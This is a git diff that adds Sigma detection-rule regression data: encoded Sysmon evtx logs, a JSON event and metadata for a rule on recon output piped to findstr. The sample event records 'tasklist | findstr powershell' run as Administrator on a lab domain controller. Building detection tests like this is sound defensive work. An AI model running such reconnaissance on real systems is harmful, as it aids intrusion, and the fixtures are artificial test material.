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�`Z5~G}==vBQ=#V=7Ut48O5 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 I`97up2P0_5*8l(j literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json new file mode 100644 index 000000000..610578ece --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:51:29.178909Z" + } + }, + "EventRecordID": 9129415, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:51:29.168", + "ProcessGuid": "5AA13A44-D5E1-68FC-1131-000000004002", + "ProcessId": 3384, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"tasklist | findstr powershell\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml new file mode 100644 index 000000000..2a5e7846c --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml @@ -0,0 +1,13 @@ +id: 5bb16f46-e370-4a40-a47a-d047e4482fc1 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ccb5742c-c248-4982-8c5c-5571b9275ad3 + title: Recon Command Output Piped To Findstr.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx new file mode 100644 index 0000000000000000000000000000000000000000..4793bbbe0af8079af0195d4362044f1083382c90 GIT binary patch literal 69632 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 